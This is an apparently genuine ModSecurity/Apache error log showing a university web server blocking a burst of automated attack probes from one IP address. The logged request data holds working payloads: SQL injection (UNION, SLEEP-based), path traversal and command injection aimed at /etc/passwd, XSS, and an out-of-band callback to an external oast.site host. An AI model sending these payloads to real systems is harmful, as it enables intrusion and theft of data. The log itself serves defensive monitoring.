[Tue Aug 29 11:35:29.303546 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAASI0G8AAAAG"]
[Tue Aug 29 11:35:29.333791 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:clientId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:clientId: {{id}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/asyncrenderer/{{url}}"] [unique_id "ZO11kcCo-f0AAAVJXnEAAAAA"]
[Tue Aug 29 11:35:30.301044 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAAN5YI4AAAAN"]
[Tue Aug 29 11:35:32.304749 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11lMCo-f0AAAUR88sAAABI"]
[Tue Aug 29 11:35:32.309295 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAAUbg3gAAABQ"]
[Tue Aug 29 11:35:32.313537 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAVr@S8AAAAZ"]
[Tue Aug 29 11:35:32.331348 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAUUZ-MAAABK"]
[Tue Aug 29 11:35:33.373222 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAASPDRkAAAAS"]
[Tue Aug 29 11:35:34.291652 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAAVr@TMAAAAZ"]
[Tue Aug 29 11:35:34.300214 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAAT9PSMAAAA1"]
[Tue Aug 29 11:35:34.332472 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAAT2JUYAAAAz"]
[Tue Aug 29 11:35:35.382106 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAAVr@TkAAAAZ"]
[Tue Aug 29 11:35:35.400492 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAAVJXnwAAAAA"]
[Tue Aug 29 11:36:24.524350 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11yMCo-f0AAAUbg5kAAABQ"]
[Tue Aug 29 11:36:24.772754 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11yMCo-f0AAAUbg58AAABQ"]
[Tue Aug 29 11:36:24.783137 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11yMCo-f0AAAUFdhAAAAA9"]
[Tue Aug 29 11:36:25.196138 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11ycCo-f0AAAUbg6YAAABQ"]
[Tue Aug 29 11:36:26.522929 2023] [:error] [pid 1434] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11ysCo-f0AAAWa-UsAAAAI"]
[Tue Aug 29 11:36:28.423319 2023] [:error] [pid 1407] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAV-t9wAAAAF"]
[Tue Aug 29 11:36:28.515866 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zMCo-f0AAASEJdgAAAAE"]
[Tue Aug 29 11:36:30.384998 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAAWdskkAAAAM"]
[Tue Aug 29 11:36:32.392629 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAASEJegAAAAE"]
[Tue Aug 29 11:36:33.526604 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAAWcCRYAAAAL"]
[Tue Aug 29 11:36:33.571307 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110cCo-f0AAASHiDkAAAAD"]
[Tue Aug 29 11:36:33.593565 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: % found within ARGS:keyword: %61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%27%2b%28%53%45%4c%45%43%54%20%6d%64%35%28%39%39%39%39%39%39%39%29%29%2b%27"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/mobile/plugin/browser.jsp"] [unique_id "ZO110cCo-f0AAAWx8x0AAAAg"]
[Tue Aug 29 11:36:34.390730 2023] [:error] [pid 1407] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:ID: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAAV-t@0AAAAF"]
[Tue Aug 29 11:36:36.972305 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAAUbg84AAABQ"]
[Tue Aug 29 11:36:37.391418 2023] [:error] [pid 1434] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWa-VMAAAAI"]
[Tue Aug 29 11:36:37.437093 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAUbg9EAAABQ"]
[Tue Aug 29 11:36:38.377347 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAWPpYcAAAAH"]
[Tue Aug 29 11:36:39.504073 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gb5jqkg7mk53h5.oast.site found within TX:1: cjmnbitjmimt14dgn26gb5jqkg7mk53h5.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAATQXpkAAAAO"]
[Tue Aug 29 11:36:41.381261 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112cCo-f0AAAWlCc4AAAAR"]
[Tue Aug 29 11:36:41.455118 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAW51SUAAAAF"]
[Tue Aug 29 11:36:42.360773 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAW51SgAAAAF"]
[Tue Aug 29 11:36:43.418083 2023] [:error] [pid 1461] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/controller/login.php"] [unique_id 